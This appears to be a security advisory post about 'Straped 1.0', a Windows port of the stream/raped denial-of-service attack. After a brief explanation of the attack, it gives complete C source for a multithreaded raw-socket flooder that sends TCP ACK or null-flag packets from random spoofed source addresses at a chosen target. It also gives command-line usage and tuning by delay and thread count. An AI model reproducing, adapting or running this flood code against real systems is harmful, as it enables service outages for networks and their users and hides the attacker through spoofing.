Stream/raped DoSSummary
The following is a DoS proof of concept that can perform both stream and raped attacks. The stream/raped was a denial of service written a few years ago only for *nix machines, this is the porting for Windows. The basic idea of stream/raped attack is very simple. It's a flood of TCP raw packets with ACK flag set or no flag set. This flood isn't much powerful since ACKs are very tiny datagrams but when the target machine receives this kind of packets it replies with an RST packet. So the victim has to reply to all spoofed source addresses with a packet and moreover if the random generated spoofed address doesn't exist or is unreachable, when replying with RST the target machine will also receive an ICMP packet from the first router.
You can configure the speed of the flooding by specifying a delay argument and if you want to amplify the number of packets you can specify a high number of threads instead of opening more instances of the program.
Credit:
The information has been provided by Marco Del Percio.
Details
Exploit:
/**
Straped 1.0 author: Marco Del Percio 20/05/2005
Remember: this is a mulithreaded program! MSVC++ compile with /MT.
Remember: This program requires raw socket support! You can't use it on Windows XP SP2 and
if you've done MS05-019 update you'll have to re-enable raw socket support! (If you still can)
see http://seclists.org/lists/nmap-hackers/2005/Apr-Jun/0001.htm for info about this.
levante at manicomio.org
*/
#define WIN32_LEAN_AND_MEAN
#include <winsock2.h>
#include <stdio.h>
#include <ws2tcpip.h>
#include <string.h>
#include <process.h>
#pragma comment(lib, "ws2_32")
/* Global variables */
WSADATA wsa;
int delay = 1;
BOOL flag = TRUE;
HANDLE TIARRAY[256];
unsigned int target;
unsigned char attackType;
/* IP header structure */
struct ip_hdr {
unsigned char ip_hl:4, ip_v:4;
unsigned char ip_tos;
unsigned short ip_len;
unsigned short ip_id;
unsigned short ip_off;
unsigned char ip_ttl;
unsigned char ip_p;
unsigned short ip_sum;
unsigned int ip_src;
unsigned int ip_dst;
};
/* TCP header structure */
struct tcp_hdr {
unsigned short th_sport;
unsigned short th_dport;
unsigned int th_seq;
unsigned int th_ack;
unsigned char th_x2:4, th_off:4;
unsigned char th_flags;
unsigned short th_win;
unsigned short th_sum;
unsigned short th_urp;
};
#define TOTAL_LEN (sizeof(struct ip_hdr) + sizeof(struct tcp_hdr))
void flood(void *id); /* Thread flood function */
/* A common checksum function */
unsigned short checksum(unsigned short *buffer, int size) {
unsigned long cksum=0;
while(size > 1) {
cksum += *buffer++;
size -= sizeof(unsigned short);
}
if(size)
cksum += *(unsigned char*)buffer;
cksum = (cksum >> 16) + (cksum & 0xffff);
cksum += (cksum >> 16);
return (unsigned short)(~cksum);
}
int main(int argc, char *argv[]) {
int i = 0, nthreads = 1;
if( argc != 5) {
printf("\nStraped 1.0 Mix of stream/raped attack ported to Windows by LeVante^\n\nUse:\n%s <target IP> <delay(ms)> <tcp flags: ack|null> <number of threads>\n",argv[0]);
exit(1);
}
if(WSAStartup(MAKEWORD(2,1),&wsa)) {
fprintf(stderr, "\nError! WSAStartup failed!\n");
exit(1);
}
/* Target Ip and type of attack (tcp flags) are shared between threads since they're global */
target = inet_addr(argv[1]);
delay = atoi(argv[2]);
if(!strcmp(argv[3],"ack"))
attackType = 0x00000010;
else if(!strcmp(argv[3],"null"))
attackType = 0x00000000;
else {
fprintf(stderr, "\nError! Tcp flags MUST be \"ack\" or \"null\".\n");
WSACleanup();
exit(1);
}
nthreads = atoi(argv[4]);
/* No more than 256 threads allowed */
if(nthreads <=0 || nthreads > 255) {
fprintf(stderr, "\nError! Number of threads must be between 1 and 256\n");
WSACleanup();
exit(1);
}
for(i=0;i<nthreads;i++) {
TIARRAY[i] = CreateMutex(NULL, FALSE, NULL);
/* The ID of each thread is the only argument passed to the thread function (as a void *) */
_beginthread( flood, 0, (void *) i);
}
Sleep(100);
printf("\nPacket flooding %s with %d threads...\n", argv[1], nthreads);
//just wait
WaitForMultipleObjects(nthreads, TIARRAY, TRUE, INFINITE);
return 0;
}
void flood(void *id) {
SOCKET sock;
int delay = 1;
unsigned char packet[4096];
struct sockaddr_in sin;
unsigned short pseudo[32], seg_length = 20;
unsigned char one,two,three,four, *ptr;
unsigned char spoofed_address[7];
struct ip_hdr *ip = (struct ip_hdr *) packet;
struct tcp_hdr *tcp = (struct tcp_hdr *) (packet + 20);
WaitForSingleObject(TIARRAY[(int)id], INFINITE);
if((sock = socket(AF_INET, SOCK_RAW, IPPROTO_IP)) == INVALID_SOCKET) {
fprintf(stderr, "\nThread with ID %d was unable to open socket\n", (int)id);
_endthread();
}
sin.sin_family = AF_INET;
sin.sin_port = htons(135); //this will be changed with a random port
sin.sin_addr.s_addr = target;
memset(packet, 0, 4096);
ip->ip_hl = 5;
ip->ip_v = 4;
ip->ip_tos = 0;
ip->ip_len = htons(TOTAL_LEN);
ip->ip_id = htons((USHORT)rand());
ip->ip_off = 0;
ip->ip_ttl = 128;
ip->ip_p = 6;
ip->ip_sum = 0;
ip->ip_src = target;
ip->ip_dst = sin.sin_addr.s_addr;
tcp->th_sport = htons((USHORT)rand()); /* Random source/destination port */
tcp->th_dport = htons((USHORT)rand());
tcp->th_seq = htonl(rand());
tcp->th_ack = htonl(0);
tcp->th_x2 = 0;
tcp->th_off = 5;
tcp->th_flags = attackType; /* either ack or no flags set */
tcp->th_win = htons(16384);
tcp->th_sum = 0;
tcp->th_urp = 0;
ip->ip_sum = checksum((unsigned short *) packet, 20);
ptr = (unsigned char *)pseudo;
/* These passages were NOT coded by me. They're from Sahir Hidayatullah. These statements are based on hard coded offsets of the various fields from the start of the datagram */
memset(pseudo,0,32); // Zero out the pseudo-header
memcpy(ptr,packet+20,20); // Copy in the tcp header
memcpy((ptr+20),packet+12,4); // Source IP
memcpy((ptr+24),packet+16,4); // Dest IP
memcpy((ptr+29),packet+9,1); // 8bit zero + Protocol
memset((ptr+31),20,1);
tcp->th_sum = checksum(pseudo, 32);
if(setsockopt(sock, IPPROTO_IP, IP_HDRINCL, (char *)&flag, sizeof(flag)) < 0) {
fprintf(stderr, "\nError! Thread with ID %d was unable to set IP_HDRINCL option\n", (int)id);
closesocket(sock);
_endthread();
}
while(1){
/* Each cycle generate a random source IP address, a random source/destination port, a random sequence number and a random IP id
then recalculate checksum both for IP and TCP and finally sends out the packet */
ptr = NULL;
sin.sin_port = htons((USHORT)rand());
one = rand() % 256;
two = rand() % 256;
three = rand() % 256;
four = rand() % 256;
sprintf(spoofed_address,"%d.%d.%d.%d\0",one,two,three,four);
ip->ip_src = inet_addr(spoofed_address);
ip->ip_id = htons((USHORT)rand());
ip->ip_sum = 0;
ip->ip_sum = checksum((unsigned short *) packet, 20);
tcp->th_sport = htons((USHORT)rand());
tcp->th_dport = htons((USHORT)rand());
tcp->th_seq = htonl(rand());
tcp->th_sum=0;
/* Same passages for re-calculating pseudo-header. */
ptr = (unsigned char *)pseudo;
memset(pseudo,0,32);
memcpy(ptr,packet+20,20);
memcpy((ptr+20),packet+12,4);
memcpy((ptr+24),packet+16,4);
memcpy((ptr+29),packet+9,1);
memset((ptr+31),20,1);
tcp->th_sum = checksum(pseudo, 32);
/* Sends out the datagram. 40 bytes is the sum of IP and TCP header length */
if(sendto(sock,packet,40,0,(struct sockaddr *) &sin, sizeof(sin)) < 0)
printf ("Thread with ID %d. Error while sending the packet: %d\n", (int)id, WSAGetLastError());
if(delay)
Sleep(delay);
}
}